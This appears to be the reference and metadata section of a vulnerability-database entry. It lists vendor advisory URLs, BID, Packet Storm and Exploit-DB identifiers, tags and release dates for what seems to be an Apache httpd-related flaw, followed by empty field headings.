url:	http://www.sophos.com/en-us/support/knowledgebase/119773.aspx	Trust: 0.3
url:	http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15273.html	Trust: 0.3
url:	http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03315912	Trust: 0.3
url:	http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c03360041	Trust: 0.3
url:	http://mail-archives.apache.org/mod_mbox/httpd-announce/201307.mbox/%3c20130710124920.2b8793ed.wrowe%40rowe-clan.net%3e	Trust: 0.3
url:	http://www.coresecurity.com/advisories/sophos-web-protection-appliance-multiple-vulnerabilities	Trust: 0.3
url:	https://h20565.www2.hp.com/portal/site/hpsc/template.page/public/kb/docdisplay/?javax.portlet.tpst=ba847bafb2a2d782fcbb0710b053ce01&javax.portlet.prp_ba847bafb2a2d782fcbb0710b053ce01=wsrp-navigational	Trust: 0.3
url:	http://www.fujitsu.com/global/support/software/security/products-f/interstage-201203e.html	Trust: 0.3
url:	http://www.xerox.com/download/security/security-bulletin/16aeb-4cd3628b94080/cert_xrx12-009_v1.1.pdf	Trust: 0.3
url:	http://httpd.apache.org/security/vulnerabilities_22.html	Trust: 0.3
url:	http://www.hitachi.co.jp/prod/comp/soft1/security/info/vuls/hs12-033/index.html	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100157326	Trust: 0.3
url:	http://www.fujitsu.com/global/support/software/security/products-f/interstage-201104e.html	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100151220	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10658&cat=sirt_1&actp=list	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=nas2b7c57b1f1035675186257927003c8d48	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html	Trust: 0.3
url:	http://seclists.org/fulldisclosure/2011/oct/232	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg1pm48384	Trust: 0.3
url:	https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c03517954&ac.admitted=1349807398574.876444892.199480143	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg27014506	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html	Trust: 0.3
url:	http://www.xerox.com/download/security/security-bulletin/12047-4e4eed8d42ca6/cert_xrx13-007_v1.0.pdf	Trust: 0.3
url:	http://support.avaya.com/css/p8/documents/100152144	Trust: 0.3

sources: BID: 51706 // BID: 49957 // PACKETSTORM: 109284 // EXPLOIT-DB: 15024

SOURCES

db:	BID	id:	51706
db:	BID	id:	49957
db:	PACKETSTORM	id:	109284
db:	EXPLOIT-DB	id:	15024

LAST UPDATE DATE

2023-05-30T11:42:38.391000+00:00

SOURCES UPDATE DATE

db:	BID	id:	51706	date:	2015-04-13T21:30:00
db:	BID	id:	49957	date:	2015-05-07T17:07:00

SOURCES RELEASE DATE

db:	BID	id:	51706	date:	2012-01-23T00:00:00
db:	BID	id:	49957	date:	2011-10-05T00:00:00
db:	PACKETSTORM	id:	109284	date:	2012-01-31T11:11:11
db:	EXPLOIT-DB	id:	15024	date:	2010-09-16T00:00:00

tag:	exploit	Trust: 0.5
tag:	remote	Trust: 0.5
tag:	protocol	Trust: 0.5
tag:	proof of concept	Trust: 0.5
tag:	info disclosure	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE